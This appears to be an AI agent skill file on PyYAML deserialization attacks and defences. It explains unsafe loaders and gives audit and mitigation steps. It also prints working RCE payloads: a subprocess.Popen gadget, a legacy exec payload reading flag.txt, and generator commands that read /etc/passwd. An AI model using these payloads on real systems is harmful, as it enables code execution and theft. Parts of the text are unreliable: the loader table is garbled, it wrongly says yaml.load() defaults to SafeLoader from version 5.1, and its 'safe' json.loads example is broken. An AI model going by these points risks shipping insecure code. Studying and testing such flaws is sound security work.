Hacktricks-skills python-yaml-deserialization
Security skill for understanding, testing, and mitigating Python YAML deserialization vulnerabilities. Use this skill whenever the user mentions YAML deserialization, PyYAML security, Python RCE through YAML, deserialization attacks, or needs to audit code for unsafe yaml.load() usage. Also trigger for requests about safe YAML loading practices, payload generation for authorized security testing, or explaining how !!python/object tags work.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/pentesting-web/deserialization/python-yaml-deserialization/SKILL.MDPython YAML Deserialization Security
This skill helps you understand, test, and mitigate YAML deserialization vulnerabilities in Python applications. Use this for authorized security testing only.
Understanding the Vulnerability
PyYAML can deserialize Python objects, not just raw data. This becomes dangerous when untrusted input is deserialized with unsafe loaders.
How Serialization Works
import yaml # Raw data - safe print(yaml.dump(str("lol"))) # Output: lol # Python objects - DANGEROUS print(yaml.dump(tuple("lol"))) # Output: # !!python/tuple # - l # - o # - l print(yaml.dump(range(1,10))) # Output: # !!python/object/apply:builtins.range # - 1 # - 10 # - 1
The
!!python/ tags indicate Python object serialization, which can execute arbitrary code when deserialized.
Safe vs Unsafe Loaders
| Function | Loader | Safe? | Notes |
|---|---|---|---|
| SafeLoader | ✅ Yes | Only basic types |
| SafeLoader | ✅ Yes | Only basic types |
(no Loader) | SafeLoader (PyYAML ≥5.1) | ✅ Yes | Default changed in 5.1 |
| Loader | ❌ No | Deserializes objects |
| UnsafeLoader | ❌ No | Deserializes objects |
| FullLoader | ❌ No | Deserializes objects |
| UnsafeLoader | ❌ No | Deserializes objects |
| FullLoader | ❌ No | Deserializes objects |
Key insight: In PyYAML ≥5.1,
yaml.load() without a Loader defaults to SafeLoader. But explicitly specifying Loader, UnsafeLoader, or FullLoader enables object deserialization.
Basic Exploits
Simple Command Execution
import yaml from yaml import UnsafeLoader # Execute sleep command data = b'!!python/object/apply:time.sleep [2]' yaml.load(data, Loader=UnsafeLoader) # Sleeps for 2 seconds
RCE via Custom Payload
import yaml import subprocess class Payload: def __reduce__(self): return (subprocess.Popen, ('ls',)) # Serialize the payload serialized = yaml.dump(Payload()) print(serialized) # Output: # !!python/object/apply:subprocess.Popen # - ls # Deserialize (executes the command) yaml.load(serialized, Loader=UnsafeLoader)
Legacy Exploit (Old PyYAML Versions)
For PyYAML <5.1 where
yaml.load() without Loader was vulnerable:
!!python/object/new:str state: !!python/tuple - 'print(getattr(open("flag.txt"), "read")())' - !!python/object/new:Warning state: update: !!python/name:exec
Or the one-liner variant:
!!python/object/new:str { state: !!python/tuple [ 'print(exec("print(open(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning { state: { update: !!python/name:exec } }, ], }
Generating Payloads
Use the
generate_yaml_payload.py script (bundled with this skill) to create test payloads:
python scripts/generate_yaml_payload.py --command "cat /etc/passwd" --output payload.yaml
Or use the external tool python-deserialization-attack-payload-generator:
python3 peas.py # Enter RCE command: cat /root/flag.txt # Enter OS: linux # Select Module: PyYAML # Done! Check /tmp/example_yaml
Auditing Code for Vulnerabilities
Vulnerable Patterns
# ❌ VULNERABLE - explicit unsafe loader yaml.load(data, Loader=UnsafeLoader) yaml.load(data, Loader=Loader) yaml.load(data, Loader=FullLoader) # ❌ VULNERABLE - unsafe functions yaml.unsafe_load(data) yaml.full_load(data) # ❌ VULNERABLE - old PyYAML (<5.1) without Loader yaml.load(data) # Only vulnerable in old versions
Safe Patterns
# ✅ SAFE - use safe_load yaml.safe_load(data) yaml.safe_load_all(data) # ✅ SAFE - PyYAML ≥5.1 without Loader (defaults to SafeLoader) yaml.load(data) # Only if you control the PyYAML version # ✅ SAFE - parse as string first, then validate import json data = json.loads(yaml.safe_load(raw_input))
Quick Audit Checklist
- Search for
in codebaseyaml.load( - Check if Loader parameter is specified
- If Loader is
,UnsafeLoader
, orLoader
→ VULNERABLEFullLoader - If using
orunsafe_load()
→ VULNERABLEfull_load() - Check PyYAML version - <5.1 without Loader is vulnerable
- Verify all YAML input is from trusted sources
Mitigation Strategies
1. Always Use safe_load()
# Replace all unsafe loading with safe_load data = yaml.safe_load(file_content)
2. Validate Input Source
# Only deserialize YAML from trusted sources if source == "internal_config": data = yaml.load(content, Loader=Loader) # OK for trusted data else: data = yaml.safe_load(content) # Required for untrusted data
3. Use Alternative Formats
Consider JSON for data interchange - it doesn't support object deserialization:
import json # JSON is inherently safe from deserialization attacks data = json.loads(json_string)
4. Pin PyYAML Version
# pyproject.toml [dependencies] pyyaml = ">=5.1" # Ensures safe default behavior
Testing Your Application
1. Check for Vulnerable Loaders
grep -r "yaml.load" --include="*.py" . grep -r "UnsafeLoader" --include="*.py" . grep -r "FullLoader" --include="*.py" .
2. Test with Payload
# test_yaml_vuln.py import yaml from yaml import UnsafeLoader test_payload = b'!!python/object/apply:time.sleep [1]' try: yaml.load(test_payload, Loader=UnsafeLoader) print("VULNERABLE: Object deserialization enabled") except Exception as e: print(f"Safe: {e}")
3. Verify safe_load Works
import yaml # This should work safe_data = yaml.safe_load("name: test\nvalue: 123") print(safe_data) # {'name': 'test', 'value': 123} # This should fail try: yaml.safe_load("!!python/object/apply:time.sleep [1]") except Exception as e: print(f"Correctly blocked: {e}")
References
- Exploit-DB: YAML Deserialization Attack in Python
- Net-Square: YAML Deserialization Attack
- PyYAML Documentation
- Python Deserialization Attack Payload Generator
When to Use This Skill
Use this skill when you need to:
- Audit Python code for YAML deserialization vulnerabilities
- Generate test payloads for authorized security testing
- Understand how !!python/object tags work
- Learn safe YAML loading practices
- Explain deserialization attacks to stakeholders
- Convert vulnerable yaml.load() calls to safe alternatives
- Test applications for RCE via YAML